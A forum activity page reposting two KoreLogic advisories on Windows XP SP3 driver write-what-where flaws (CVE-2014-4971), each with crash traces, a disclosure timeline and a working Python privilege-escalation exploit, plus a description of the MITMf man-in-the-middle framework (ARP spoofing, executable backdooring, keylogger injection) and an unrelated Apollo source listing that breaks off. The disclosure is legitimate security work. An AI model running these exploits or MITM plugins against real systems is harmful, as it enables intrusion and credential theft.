Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18715

  • Joined

  • Last visited

  • Days Won

    701

 Content Type 

Everything posted by Nytro

  1. Nytro
    Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation Authored by Matthew Bergin A vulnerability within the MQAC module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. Microsoft MQ Access Control version 5.1.0.1110 on XP SP3 is affected. Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation Advisory ID: KL-001-2014-003 Publication Date: 2014.07.18 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt 1. Vulnerability Details Affected Vendor: Microsoft Affected Product: MQ Access Control Affected Versions: 5.1.0.1110 Platform: Microsoft Windows XP SP3 CWE Classification: CWE-123: Write-what-where Condition Impact: Privilege Escalation Attack vector: IOCTL CVE ID: CVE-2014-4971 2. Vulnerability Description A vulnerability within the MQAC module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. 3. Technical Description A userland process can create a handle into the MQAC device and subsequently make DeviceIoControlFile() calls into that device. During the IRP handler routine for 0x1965020f the user provided OutputBuffer address is not validated. This allows an attacker to specify an arbitrary address and write (or overwrite) the memory residing at the specified address. This is classically known as a write-what-where vulnerability and has well known exploitation methods associated with it. A stack trace from our fuzzing can be seen below. In our fuzzing testcase, the specified OutputBuffer in the DeviceIoControlFile() call is 0xffff0000. STACK_TEXT: b1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b b1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7 b1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc b1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d b1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d b1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31 b1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70 b1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7 b1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' command shows the fault originating in the mqac driver. OLLOWUP_IP: mqac!AC2QM+5d b230af37 891e mov dword ptr [esi],ebx Reviewing the TRAP_FRAME at the time of crash we can see IopCompleteRequest() copying data from InputBuffer into the OutputBuffer. InputBuffer is another parameter provided to the DeviceIoControlFile() function and is therefore controllable by the attacker. The edi register contains the invalid address provided during the fuzz testcase. TRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4) ErrCode = 00000002 eax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000 eip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 mqac!AC2QM+0x5d: b230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=???????? A write-what-where vulnerability can be leveraged to obtain escalated privileges. To do so, an attacker will need to allocate memory in userland that is populated with shellcode designed to find the Token for PID 4 (System) and then overwrite the token for its own process. By leveraging the vulnerability in MQAC it is then possible to overwrite the pointer at HalDispatchTable+0x4 with a pointer to our shellcode. Calling NtQueryIntervalProfile() will subsequently call HalDispatchTable+0x4, execute our shellcode, and elevate the privilege of the exploit process. 4. Mitigation and Remediation Recommendation None. A patch is not likely to be forthcoming from the vendor. 5. Credit This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc. 6. Disclosure Timeline 2014.04.28 - Initial contact; sent Microsoft report and PoC. 2014.04.28 - Microsoft acknowledges receipt of vulnerability report; states XP is no longer supported and asks if the vulnerability affects other versions of Windows. 2014.04.29 - KoreLogic asks Microsoft for clarification of their support policy for XP. 2014.04.29 - Microsoft says XP-only vulnerabilities will not be addressed with patches. 2014.04.29 - KoreLogic asks if Microsoft intends to address the vulnerability report. 2014.04.29 - Microsoft opens case to investigate the impact of the vulnerability on non-XP systems. 2014.05.06 - Microsoft asks again if this vulnerability affects non-XP systems. 2014.05.14 - KoreLogic informs Microsoft that the vulnerability report is for XP and other Windows versions have not been examined. 2014.06.11 - KoreLogic informs Microsoft that 30 business days have passed since vendor acknowledgement of the initial report. KoreLogic requests CVE number for the vulnerability, if there is one. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date. 2014.06.11 - Microsoft responds to KoreLogic that the vulnerability does not affect an "up-platform" product. Says they are investigating embedded platforms. Does not provide a CVE number or a disclosure date. 2014.06.30 - KoreLogic asks Microsoft for confirmation of their receipt of the updated PoC. Also requests that a CVE ID be issued to this vulnerability. 2014.07.02 - 45 business days have elapsed since Microsoft acknowledged receipt of the vulnerability report and PoC. 2014.07.07 - KoreLogic requests CVE from MITRE. 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to be identical to KL-001-2014-002 and issues CVE-2014-4971 for both vulnerabilities. 2014.07.18 - Public disclosure. 7. Proof of Concept #!/usr/bin/python2 # # KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation # Matt Bergin (KoreLogic / Smash the Stack) # CVE-2014-4971 # from ctypes import * from struct import pack from os import getpid,system from sys import exit EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0 # thanks to offsec for the concept # I re-wrote the code as to not fully insult them def getBase(name=None): retArray = c_ulong*1024 ImageBase = retArray() callback = c_int(1024) cbNeeded = c_long() EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded)) for base in ImageBase: driverName = c_char_p("\x00"*1024) GetDeviceDriverBaseNameA(base,driverName,48) if (name): if (driverName.value.lower() == name): return base else: return (base,driverName.value) return None handle = CreateFileA("\\\\.\\MQAC",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) print "[+] Handle \\\\.\\MQAC @ %s" % (handle) NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40) buf = "\x50\x00\x00\x00"+"\x90"*0x400 WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0))) WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0))) WriteProcessMemory(-1, 0x5000, "\xcc", 77, byref(c_int(0))) #Overwrite Pointer kBase,kVer = getBase() hKernel = LoadLibraryExA(kVer,0,1) HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable") HalDispatchTable -= hKernel HalDispatchTable += kBase HalDispatchTable += 0x4 print "[+] Kernel @ %s, HalDispatchTable @ %s" % (hex(kBase),hex(HalDispatchTable)) DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0) print "[+] HalDispatchTable+0x4 overwritten" CloseHandle(handle) NtQueryIntervalProfile(c_ulong(2),byref(c_ulong())) exit(0) The contents of this advisory are copyright(c) 2014 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt Sursa: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation ? Packet Storm
  2. Nytro
    Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation Authored by Matthew Bergin A vulnerability within the BthPan module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. Microsoft Bluetooth Personal Area Networking version 5.1.2600.5512 on XP SP3 is affected. Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation Advisory ID: KL-001-2014-002 Publication Date: 2014-07-18 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt 1. Vulnerability Details Affected Vendor: Microsoft Affected Product: Bluetooth Personal Area Networking Affected Versions: 5.1.2600.5512 Platform: Microsoft Windows XP SP3 CWE Classification: CWE-123: Write-what-where Condition Impact: Privilege Escalation Attack vector: IOCTL CVE ID: CVE-2014-4971 2. Vulnerability Description A vulnerability within the BthPan module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. 3. Technical Description A userland process can create a handle into the BthPan device and subsequently make DeviceIoControlFile() calls into that device. During the IRP handler routine for 0x0012b814 the user provided OutputBuffer address is not validated. This allows an attacker to specify an arbitrary address and write (or overwrite) the memory residing at the specified address. This is classicaly known as a write-what-where vulnerability and has well known exploitation methods associated with it. A stack trace from our fuzzing can be seen below. In our fuzzing testcase, the specified OutputBuffer in the DeviceIoControlFile() call is 0xffff0000. STACK_TEXT: b1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b b1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7 b1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc b1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92 b1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3 b1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8 b1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25 b1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b b1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21 b1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b b1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8 b1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93 b1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48 b1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c b1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31 b1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70 b1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7 b1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a WARNING: Stack unwind information not available. Following frames may be wrong. Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' command shows the fault originating in the bthpan driver. FOLLOWUP_IP: bthpan!BthpanReqAdd+16b b272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565) Reviewing the TRAP_FRAME at the time of crash we can see IopCompleteRequest() copying data from InputBuffer into the OutputBuffer. InputBuffer is another parameter provided to the DeviceIoControlFile() function and is therefore controllable by the attacker. The edi register contains the invalid address provided during the fuzz testcase. TRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630) ErrCode = 00000002 eax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000 eip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010203 nt!IopCompleteRequest+0x92: 804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] A write-what-where vulnerability can be leveraged to obtain escalated privileges. To do so, an attacker will need to allocate memory in userland that is populated with shellcode designed to find the Token for PID 4 (System) and then overwrite the token for its own process. By leveraging the vulnerability in BthPan it is then possible to overwrite the pointer at HalDispatchTable+0x4 with a pointer to our shellcode. Calling NtQueryIntervalProfile() will subsequently call HalDispatchTable+0x4, execute our shellcode, and elevate the privilege of the exploit process. 4. Mitigation and Remediation Recommendation None. A patch is not likely to be forthcoming from the vendor. 5. Credit This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc. 6. Disclosure Timeline 2014.04.28 - Initial contact; sent Microsoft report and PoC. 2014.04.28 - Microsoft acknowledges receipt of vulnerability report; states XP is no longer supported and asks if the vulnerability affects other versions of Windows. 2014.04.29 - KoreLogic asks Microsoft for clarification of their support policy for XP. 2014.04.29 - Microsoft says XP-only vulnerabilities will not be addressed with patches. 2014.04.29 - KoreLogic asks if Microsoft intends to address the vulnerability report. 2014.04.29 - Microsoft opens case to investigate the impact of the vulnerability on non-XP systems. 2014.05.06 - Microsoft asks again if this vulnerability affects non-XP systems. 2014.05.14 - KoreLogic informs Microsoft that the vulnerability report is for XP and other Windows versions have not been examined. 2014.06.11 - KoreLogic informs Microsoft that 30 business days have passed since vendor acknowledgement of the initial report. KoreLogic requests CVE number for the vulnerability, if there is one. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date. 2014.06.11 - Microsoft informs KoreLogic that the vulnerability does not impact any "up-platform" products. Says they are investigating embedded platforms. Does not provide CVE number. 2014.06.24 - Microsoft contacts KoreLogic to say that they confused the report of this vulnerability with another and that they cannot reproduce the described behavior. Microsoft asks for an updated Proof-of-Concept, crash dumps or any further analysis of the vulnerability that KoreLogic can provide. 2014.06.25 - KoreLogic provides Microsoft with an updated Proof-of-Concept which demonstrates using the vulnerability to spawn a system shell. 2014.06.30 - KoreLogic asks Microsoft for confirmation of their receipt of the updated PoC. Also requests that a CVE ID be issued for this vulnerability. 2014.07.02 - 45 business days have elapsed since Microsoft acknowledged receipt of the vulnerability report and PoC. 2014.07.07 - KoreLogic requests CVE from MITRE. 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be identical to KL-001-2014-003 and issues CVE-2014-4971 for both vulnerabilities. 2014.07.18 - Public disclosure. 7. Proof of Concept #!/usr/bin/python2 # # KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation # Matt Bergin (KoreLogic / Smash the Stack) # CVE-2014-4971 # from ctypes import * from struct import pack from os import getpid,system from sys import exit EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0 # thanks to offsec for the concept # I re-wrote the code as to not fully insult them def getBase(name=None): retArray = c_ulong*1024 ImageBase = retArray() callback = c_int(1024) cbNeeded = c_long() EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded)) for base in ImageBase: driverName = c_char_p("\x00"*1024) GetDeviceDriverBaseNameA(base,driverName,48) if (name): if (driverName.value.lower() == name): return base else: return (base,driverName.value) return None handle = CreateFileA("\\\\.\\BthPan",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) if (handle == INVALID_HANDLE_VALUE): print "[!] Could not open handle to BthPan" exit(1) NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40) buf = "\xcc\xcc\xcc\xcc"+"\x90"*0x400 WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0))) WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0))) kBase,kVer = getBase() hKernel = LoadLibraryExA(kVer,0,1) HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable") HalDispatchTable -= hKernel HalDispatchTable += kBase HalDispatchTable += 0x4 DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0) CloseHandle(handle) NtQueryIntervalProfile(c_ulong(2),byref(c_ulong())) exit(0) The contents of this advisory are copyright(c) 2014 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt Sursa: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation ? Packet Storm
  3. Nytro
    MITMf Framework for Man-In-The-Middle attacks Quick tutorial and examples at Trying to take the dum-dum out of security... This tool is completely based on sergio-proxy https://code.google.com/p/sergio-proxy/ and is an attempt to revive and update the project. Availible plugins: ArpSpoof - Redirect traffic using arp-spoofing BrowserProfiler - Attempts to enumerate all browser plugins of connected clients CacheKill - Kills page caching by modifying headers FilePwn - Backdoor executables being sent over http using bdfactory Inject - Inject arbitrary content into HTML content JavaPwn - Performs drive-by attacks on clients with out-of-date java browser plugins jskeylogger - Injects a javascript keylogger into clients webpages Replace - Replace arbitary content in HTML content SMBAuth - Evoke SMB challenge-response auth attempts Upsidedownternet - Flips images 180 degrees Sursa: https://github.com/byt3bl33d3r/MITMf
  4. Nytro
    [TABLE] [TR] [TD][/TD] [TD]Parent Directory[/TD] [TD] [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AGC_BLOCK_TWO_SELF-CHECK.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 94K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ALARM_AND_ABORT.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 35K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ANGLFIND.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 98K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ASSEMBLY_AND_OPERATION_INFORMATION.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]175K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AUTOMATIC_MANEUVERS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 83K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Apollo32.png[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]2.6K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]CM_BODY_ATTITUDE.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 49K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]CM_ENTRY_DIGITAL_AUTOPILOT.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]212K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]CONIC_SUBROUTINES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]301K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]CONTRACT_AND_APPROVALS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 13K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]CSM_GEOMETRY.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 64K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]DISPLAY_INTERFACE_ROUTINES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]242K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]DOWN-TELEMETRY_PROGRAM.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 81K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]DOWNLINK_LISTS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 76K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ENTRY_LEXICON.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 56K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ERASABLE_ASSIGNMENTS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]642K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]EXECUTIVE.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 82K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]EXTENDED_VERBS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]214K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]FIXED_FIXED_CONSTANT_POOL.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 48K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]FRESH_START_AND_RESTART.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]239K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]GIMBAL_LOCK_AVOIDANCE.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 14K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]GROUND_TRACKING_DETERMINATION_PROGRAM.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 34K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]IMU_CALIBRATION_AND_ALIGNMENT.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]226K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]IMU_COMPENSATION_PACKAGE.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 64K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]IMU_MODE_SWITCHING_ROUTINES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]169K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]INFLIGHT_ALIGNMENT_ROUTINES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 45K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]INTEGRATION_INITIALIZATION.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]188K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]INTER-BANK_COMMUNICATION.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 32K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]INTERPRETER.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]507K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]INTERPRETIVE_CONSTANTS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 12K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]INTERRUPT_LEAD_INS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 19K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]JET_SELECTION_LOGIC.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]155K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]KALCMANU_STEERING.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 45K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]KEYRUPT_UPRUPT.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 24K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]LATITUDE_LONGITUDE_SUBROUTINES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 49K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]LUNAR_AND_SOLAR_EPHEMERIDES_SUBROUTINES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 32K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]LUNAR_LANDMARK_SELECTION_FOR_CM.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]6.2K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]MAIN.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]296K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]MEASUREMENT_INCORPORATION.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 80K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]MYSUBS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 16K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ORBITAL_INTEGRATION.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]145K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P11.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]149K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P20-P25.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]579K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P30-P37.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 95K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P32-P33_P72-P73.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]218K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P34-35_P74-75.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]275K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P37_P70.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]313K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P40-P47.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]395K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P51-P53.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]347K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P61-P67.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]192K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P76.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 28K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]PHASE_TABLE_MAINTENANCE.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 66K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]PINBALL_GAME_BUTTONS_AND_LIGHTS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]653K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]PINBALL_NOUN_TABLES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]158K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]PLANETARY_INERTIAL_ORIENTATION.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 61K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]POWERED_FLIGHT_SUBROUTINES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 60K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] 